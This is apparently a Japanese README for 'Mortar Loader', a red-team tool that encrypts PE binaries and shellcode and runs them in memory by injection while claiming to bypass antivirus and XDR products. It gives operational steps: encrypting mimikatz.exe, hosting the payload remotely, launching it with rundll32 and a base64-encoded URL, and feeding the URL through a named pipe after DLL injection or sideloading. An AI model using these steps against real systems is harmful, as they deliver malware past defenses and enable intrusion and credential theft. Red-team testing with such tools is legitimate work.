
レッドチームの回避技術で、セキュリティ製品の検知と防止を無効化し、迂回します。Mortar Loaderは、メモリストリーム内でPE/シェルコードの暗号化と復号化を行い、いくつかのインジェクション技術を活用して実行します。Mortarは、最新のアンチウイルス製品や高度なXDRソリューションをバイパスすることができ、以下についてテストされ、バイパスが確認されています。
新しいバージョンリリース(v3)には、以下の機能が含まれています。
詳細な技術説明については、以下のブログ記事を参照してください。 : https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
暗号化ツールはCシェルコードとPEバイナリを暗号化し、出力を.encファイルに書き込みます。RAW形式ではなく、x64アーキテクチャであれば、任意のペイロード(MSF/Cobalt/Havocなど)を使用できます。
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
新しいリリースでは、リモートペイロード取得と組み合わせたいくつかのテクニックを活用しています。詳細については、以下のブログ記事を参照することをお勧めします。
クイックインストラクション:
# PE Forking
1. host your encrypted binary on remote host.
2. encode the final URL with base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled.
現在、アーリーバードインジェクションと名前付きパイプを組み合わせて、最終実行のための変数を受け取ることをサポートしています。
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. payload will be executed once valid value has been recieved.
このプロジェクトはFPC(Free Pascal)を使用してコーディングされています。コンパイル手順は簡単で、Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads) をダウンロードしてインストールするだけです。
暗号化ツールはリリースセクションからダウンロードするか、Lazarus IDEで簡単にコンパイルできます。
#Debian & Ubuntu
apt install fpc
apt install lazarus-ide
Mortarやその他の共有プロジェクトの開発は、私個人の時間の成果です。